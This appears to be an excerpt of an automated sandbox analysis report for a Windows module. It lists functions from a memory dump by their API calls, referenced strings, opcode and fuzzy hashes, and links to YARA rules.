Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: aa112234f792f27814b14ff911b52b6eea54cfbe71ed1e36bd38c72cce701f6c
Instruction ID: 163ca9aafe710dc2f1b8d978754783fd54903d43b97ef667acf060728439a7be
Opcode Fuzzy Hash: aa112234f792f27814b14ff911b52b6eea54cfbe71ed1e36bd38c72cce701f6c
Instruction Fuzzy Hash: 6201C4BA518719ABCB00EB648D88DDF77ADEF45350F148061E915D7241EE38D945C7A0

Function 6FA7FE0E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FA7FE1A

Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F

__amsg_exit.LIBCMT ref: 6FA7FE3A
__lock.LIBCMT ref: 6FA7FE4A
InterlockedDecrement.KERNEL32(?), ref: 6FA7FE67
InterlockedIncrement.KERNEL32(02B128C0), ref: 6FA7FE92

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 00e962186b445bfa1a3a8b9d3d2eefbc8aef20195914667f4075a5cfff2eff64
Instruction ID: 74ad2734740596f856e04f7aff9a453f5aa4082722fa629b6e2c33a83739b396
Opcode Fuzzy Hash: 00e962186b445bfa1a3a8b9d3d2eefbc8aef20195914667f4075a5cfff2eff64
Instruction Fuzzy Hash: 3B015E3AA01B219BDA319B698904F5E77E1AF85724F04411DE81067291CF2CBAD2CBD5

Function 6FA6C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6FA6C179), ref: 6FA6C13B
GlobalHandle.KERNEL32(?), ref: 6FA6C149
GlobalUnlock.KERNEL32(00000000), ref: 6FA6C152
GlobalFree.KERNEL32(00000000), ref: 6FA6C159
DeleteCriticalSection.KERNEL32(?,?,?,6FA6C179), ref: 6FA6C163

Part of subcall function 6FA6BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FA6BFBC
Part of subcall function 6FA6BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FA6BFCC
Part of subcall function 6FA6BF5D: LocalFree.KERNEL32(?), ref: 6FA6BFD5
Part of subcall function 6FA6BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FA6BFE7

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: f42b937f1979750bb637fdf3206afeb275910034afc528d9f2f6babeee2dc7c3
Instruction ID: 7b55099819db833d7fdfe9e06f1dc17597766565e3a62fb844614f6195659cf1
Opcode Fuzzy Hash: f42b937f1979750bb637fdf3206afeb275910034afc528d9f2f6babeee2dc7c3
Instruction Fuzzy Hash: DAF05E36204B009BDE109B389C48E5A3BB9AF87A717594609F539D7394DF78E8538770

Function 6FA7140F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6FA6C220: EnterCriticalSection.KERNEL32(6FA934A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C25A
Part of subcall function 6FA6C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C26C
Part of subcall function 6FA6C220: LeaveCriticalSection.KERNEL32(6FA934A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C279
Part of subcall function 6FA6C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C289

Part of subcall function 6FA6BB0C: __EH_prolog3_catch.LIBCMT ref: 6FA6BB13

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FA71458
FreeLibrary.KERNEL32(?), ref: 6FA71468

Strings

hhctrl.ocx, xrefs: 6FA7143C
HtmlHelpW, xrefs: 6FA71452

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: ad2b3ad36c21dd8f8c82fb00b464eb56df170e66856fd1dfb3760079f2d4c72d
Instruction ID: 19873c64a7ee4812b4c6899dbe2ce9c8a3033dbad06fa4cc12fa42b6c754eb62
Opcode Fuzzy Hash: ad2b3ad36c21dd8f8c82fb00b464eb56df170e66856fd1dfb3760079f2d4c72d
Instruction Fuzzy Hash: 4701FD71100B06ABCB211BB6CE14F5A3BE4AF04769F00C424F86AA9190CF7CE0D08B11

Function 6FA7C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6FA7C7D6

Part of subcall function 6FA7C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FA7C767

_UnwindNestedFrames.LIBCMT ref: 6FA7C7ED
___FrameUnwindToState.LIBCMT ref: 6FA7C7FB

Strings

csm, xrefs: 6FA7C7D2, 6FA7C7E7, 6FA7C7FA, 6FA7C818, 6FA7C828

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: 915c48793b8c54c35fefb6533b0f6e7fa43831be68c0a21aee169542e260c9d3
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: 4201E43A000209BBDF225E51CE84EEA7F6AFF18358F144011BD1865160DF3AE9B1EBA1

Function 6FA7ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6FA777D7), ref: 6FA7ED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FA7ED8C

Strings

KERNEL32, xrefs: 6FA7ED77
IsProcessorFeaturePresent, xrefs: 6FA7ED86

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 5e830134cf1f00d7a61ea8ce3c2507d209441ca420953d861f2cf5c88e29514c
Instruction ID: 0512204adb69e970d8f58a721625c36d1c4f85975e190e2b0da659fca896d571
Opcode Fuzzy Hash: 5e830134cf1f00d7a61ea8ce3c2507d209441ca420953d861f2cf5c88e29514c
Instruction Fuzzy Hash: CAF09034A04A09E2DF002BB1ED4D6AF7F7AFF82342F820880E1A1A01C4DF7484F1D245

Function 6FA67D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FA67D88
GetFileTime.KERNEL32(?,?,?,?), ref: 6FA67DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6FA67DD7

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: 2215a2ab9e7a80f9e7167f4a9ffc76ca5cd58d2427686d38d91a97db9d344b7f
Instruction ID: 0817eb1c2e7d385efd88ebc6587ceb989b1f439a1e21a12f784af8c3a6b13a24
Opcode Fuzzy Hash: 2215a2ab9e7a80f9e7167f4a9ffc76ca5cd58d2427686d38d91a97db9d344b7f
Instruction Fuzzy Hash: F7510D715147059FD720CF68C940D9AB7F8FF09320B148A1EE4A6D7690EB38F985CB60

Function 6FA8081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FA8084F
__isleadbyte_l.LIBCMT ref: 6FA80883
MultiByteToWideChar.KERNEL32(00000080,00000009,6FA740D8,6FA8BF84,00000000,00000000,?,?,?,?,6FA740D8,00000000,?), ref: 6FA808B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6FA740D8,00000001,00000000,00000000,?,?,?,?,6FA740D8,00000000,?), ref: 6FA80922

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ca665d4fb6ca39404b43f979776bda1aa7f611317e633a7d7525dcad0a653ea1
Instruction ID: 99cb6a3309cf2e2cd485d319a0fefbebaac8a879cc8b14053231b2508ce34312
Opcode Fuzzy Hash: ca665d4fb6ca39404b43f979776bda1aa7f611317e633a7d7525dcad0a653ea1
Instruction Fuzzy Hash: BF31A231906285EFEB10DFA4C8849AE3BB5BF01310F19D5AAE4749B191D7B4F9C1DB90

Function 6FA68EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FA68ED0

Part of subcall function 6FA69C7C: __EH_prolog3.LIBCMT ref: 6FA69C83

__wcsdup.LIBCMT ref: 6FA68EF2
GetCurrentThread.KERNEL32 ref: 6FA68F1F
GetCurrentThreadId.KERNEL32 ref: 6FA68F28

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 07c02b32910fbb1dd75a96d57c6d7eff0eaa0e1e98981e64cb6bae07b3a8dfb1
Instruction ID: c2b96b5118595d9f3974e9fa5f33917eb0b4565d40157ceb7e1603287badf6ea
Opcode Fuzzy Hash: 07c02b32910fbb1dd75a96d57c6d7eff0eaa0e1e98981e64cb6bae07b3a8dfb1
Instruction Fuzzy Hash: F2216BB0944B508FC7219F7A824464AFBF8BFA5704F10891FD1AAC7B61DBB8A481CF55

Function 6FA71D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA71D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA71D5E
GetCapture.USER32 ref: 6FA71D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FA71D7F

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 084d3fc5ef797b98fe2c721ccc43854937dd98f380b3e330c239d7675a8d37f5
Instruction ID: 839c33558fa919550c1da5f7806a81cc1ac56ac4cb9e2f52c6584f444e76caaa
Opcode Fuzzy Hash: 084d3fc5ef797b98fe2c721ccc43854937dd98f380b3e330c239d7675a8d37f5
Instruction Fuzzy Hash: 3E011A753547947BDF301B628CCDFEB3E7ADBCAB10F150079B6159A1E6CEA58880DA20

Function 6FA66A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FA66A8A

Part of subcall function 6FA668E2: _malloc.LIBCMT ref: 6FA66900

__CxxThrowException@8.LIBCMT ref: 6FA66AC0
FormatMessageW.KERNEL32(00001100,00000000,6FA8C050,00000800,000000FF,00000000,00000000,?,?,6FA8D898,00000004,6FA616A6,?,6FA6155A,8007000E,6FA613DE), ref: 6FA66AEA
LocalFree.KERNEL32(000000FF,000000FF,6FA6279F), ref: 6FA66B12

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: e3fbd4b0989cb70ce308340e4c2ec83af6e9bf0190b53497d138ba4be86a4899
Instruction ID: cc894b16765116089e881b441e46e150615fb489fae3a1244a4dcf07ddc0a3f9
Opcode Fuzzy Hash: e3fbd4b0989cb70ce308340e4c2ec83af6e9bf0190b53497d138ba4be86a4899
Instruction Fuzzy Hash: FC118C71610309AFEF048F68CC40EA93BB5FF4A710F24C529B5288E3D0EB7599908B50

Function 6FA6D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FA6D194
RegCloseKey.ADVAPI32(00000000), ref: 6FA6D19D
swprintf.LIBCMT ref: 6FA6D1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FA6D1CB

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 535d7f54b9e7a46fafe4eaa8ed534b3fc4e032860baae44ab461113881b4f21c
Instruction ID: 08d1978a63bbf41bb34066f69ae49586d98d70a0a78cd788d7369aedc74e2383
Opcode Fuzzy Hash: 535d7f54b9e7a46fafe4eaa8ed534b3fc4e032860baae44ab461113881b4f21c
Instruction Fuzzy Hash: ED01E132500309ABDB109B248C45FAF77ACAF4A754F140419F911A7180DFB8E951C7A0

Function 6FA67287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6FA668E2: _malloc.LIBCMT ref: 6FA66900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FA672BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6FA672C1
DuplicateHandle.KERNEL32(00000000), ref: 6FA672C4
GetLastError.KERNEL32(?), ref: 6FA672DF

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: ad2915563bab32f7727b9d7c947e5c20fe22912c01763d8be242f73a36aa9896
Instruction ID: c305183b469546a3d34e5618bc3e2b36ba15facb21756281a77dbd916872f2dd
Opcode Fuzzy Hash: ad2915563bab32f7727b9d7c947e5c20fe22912c01763d8be242f73a36aa9896
Instruction Fuzzy Hash: F301D431600701ABDB009BB5CD88F9A7BA9EF85724F148411F514CB280EFB4EC418760

Function 6FA70F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6FA70F9D
GetTopWindow.USER32(00000000), ref: 6FA70FDC
GetWindow.USER32(00000000,00000002), ref: 6FA70FFA

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 9b6066ad5e9ffcccdb38d7f67479426e39654eb2b43ac251e494942fe0c07083
Instruction ID: 9b9e324423414b8dcf45c75769bff71e85e5ccd62f1bf38b1d30bf3507121e8d
Opcode Fuzzy Hash: 9b6066ad5e9ffcccdb38d7f67479426e39654eb2b43ac251e494942fe0c07083
Instruction Fuzzy Hash: C101213604965ABBCF225F518D04EDF3F25EF45360F059011F92055150CF3AD5B2DBA1

Function 6FA7EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6FA7EC89

Part of subcall function 6FA7EAAE: __fltout2.LIBCMT ref: 6FA7EADA

__cftog_l.LIBCMT ref: 6FA7ECAF
__cftoe_l.LIBCMT ref: 6FA7ECE1

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 0f6f1f4e7876a1d9d2d180f6bb8be1b1fc9b9545ff4f616325c843e0f11180f6
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: F911807A40028EBBCF225F84CD91CDE3F66BB19354B088415FA2858170DB3AD6B1AB81

Function 6FA703CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6FA703DC
GetTopWindow.USER32(00000000), ref: 6FA703EF

Part of subcall function 6FA703CF: GetWindow.USER32(00000000,00000002), ref: 6FA70436

GetTopWindow.USER32(?), ref: 6FA7041F

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 6319793de4d0be61dab834bbd9c6db2242885ecf5d282f74fd3287991228ecc1
Instruction ID: 2cbe93f9282fc28b807cb212c35305a10604d9195fbe01762011eda81b4e5cf0
Opcode Fuzzy Hash: 6319793de4d0be61dab834bbd9c6db2242885ecf5d282f74fd3287991228ecc1
Instruction Fuzzy Hash: B201D43A045A1A6B8B322F228D04ECF3B29AF423A0F05E021FD2495141EF3BD5929695

Function 6FA8057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FA80586

Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F

__getptd.LIBCMT ref: 6FA8059D
__amsg_exit.LIBCMT ref: 6FA805AB
__lock.LIBCMT ref: 6FA805BB

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 5d14fe69f2a1c427e5b14fd869aa313619f179635f5b185cbc8a7995a243bfe5
Instruction ID: d0bf8809a8a2cc7de514b46fc279f756234bd01e820d88a053294ae0c5f1fca0
